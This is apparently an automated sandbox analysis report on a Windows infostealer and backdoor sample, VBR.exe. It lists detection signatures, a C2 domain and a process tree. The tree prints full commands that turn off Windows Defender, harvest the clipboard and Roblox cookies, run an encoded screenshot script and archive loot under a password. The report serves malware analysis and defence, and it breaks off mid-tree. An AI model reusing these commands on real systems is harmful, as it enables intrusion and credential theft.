Resubmissions

09-10-2024 19:31

241009-x8h2eawgpc 10

09-10-2024 19:27

241009-x6cfvawgjc 10

Analysis

  • max time kernel
    149s
  • max time network
    279s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-10-2024 19:31

General

  • Target

    VBR.exe

  • Size

    7.6MB

  • MD5

    81711a07e09960fb3cff42a395a0d6da

  • SHA1

    a0ee96f364149e8b49758773106916accd212f83

  • SHA256

    ee67215d30e8b08d54518f88ecdb0fdbb7f2791960c0021f799d122c745608e7

  • SHA512

    f68faef3d59878c52011c77ad7e66c5e7bae5ce3c435635bacd78c1f8efea682fec688f2676d55130e268dbc3a4261c518029dbae36527e356507d3636869cc1

  • SSDEEP

    196608:Hyd0cDeQLjv+bhqNVoBKUh8mz4Iv9Pfu1D7c:9ieAL+9qz8/b4INuRc

Malware Config

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

  • Detects Bdaejec Backdoor. 1 IoCs

    Bdaejec is backdoor written in C++.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

  • Stops running service(s) 4 TTPs
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 4 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 6 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\VBR.exe
    "C:\Users\Admin\AppData\Local\Temp\VBR.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Users\Admin\AppData\Local\Temp\VBR.exe
      "C:\Users\Admin\AppData\Local\Temp\VBR.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4972
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\VBR.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2456
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\VBR.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3136
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4628
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5084
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1440
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2244
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2432
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5004
          • C:\Users\Admin\AppData\Local\Temp\WuZkxmLb.exe
            C:\Users\Admin\AppData\Local\Temp\WuZkxmLb.exe
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            PID:3548
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\095862ed.bat" "
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2844
              • C:\Windows\System32\Conhost.exe
                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                7⤵
                  PID:3456
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sc stop FairplayKD >nul
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3304
              • C:\Windows\SysWOW64\sc.exe
                sc stop FairplayKD
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:5292
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sc delete FairplayKD >nul
              5⤵
              • System Location Discovery: System Language Discovery
              PID:5512
              • C:\Windows\SysWOW64\sc.exe
                sc delete FairplayKD
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:5680
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sc stop FairplayKD1 >nul
              5⤵
              • System Location Discovery: System Language Discovery
              PID:5748
              • C:\Windows\SysWOW64\sc.exe
                sc stop FairplayKD1
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:5772
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sc delete FairplayKD1 >nul
              5⤵
              • System Location Discovery: System Language Discovery
              PID:5924
              • C:\Windows\SysWOW64\sc.exe
                sc delete FairplayKD1
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:5960
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2640
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3540
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:684
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2560
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4644
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3456
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:748
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Clipboard Data
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4212
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1532
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3132
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4420
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:4412
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            3⤵
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:1744
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              4⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:1516
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3732
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              4⤵
              • Gathers system information
              PID:64
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1772
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4008
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wwfdw5hr\wwfdw5hr.cmdline"
                5⤵
                  PID:5624
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEC63.tmp" "c:\Users\Admin\AppData\Local\Temp\wwfdw5hr\CSC49567EC92E8408782915DF85C1D7494.TMP"
                    6⤵
                      PID:5796
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                  PID:5328
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    4⤵
                      PID:5504
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:5592
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:5732
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                        3⤵
                          PID:5808
                          • C:\Windows\system32\tree.com
                            tree /A /F
                            4⤵
                              PID:5932
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            3⤵
                              PID:5984
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                4⤵
                                  PID:6092
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:6132
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:5148
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "getmac"
                                    3⤵
                                      PID:5620
                                      • C:\Windows\system32\getmac.exe
                                        getmac
                                        4⤵
                                          PID:5704
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                        3⤵
                                          PID:1540
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            4⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5752
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                          3⤵
                                            PID:5128
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                              4⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:6036
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI21442\rar.exe a -r -hp"tadyleak" "C:\Users\Admin\AppData\Local\Temp\X49BY.zip" *"
                                            3⤵
                                              PID:6092
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                4⤵
                                                  PID:5984
                                                • C:\Users\Admin\AppData\Local\Temp\_MEI21442\rar.exe
                                                  C:\Users\Admin\AppData\Local\Temp\_MEI21442\rar.exe a -r -hp"tadyleak" "C:\Users\Admin\AppData\Local\Temp\X49BY.zip" *
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:6136
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                3⤵
                                                  PID:1164
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic os get Caption
                                                    4⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5324
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                  3⤵
                                                    PID:5320
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic computersystem get totalphysicalmemory
                                                      4⤵
                                                        PID:3100
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                      3⤵
                                                        PID:2384
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic csproduct get uuid
                                                          4⤵
                                                            PID:1312
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                          3⤵
                                                            PID:3680
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
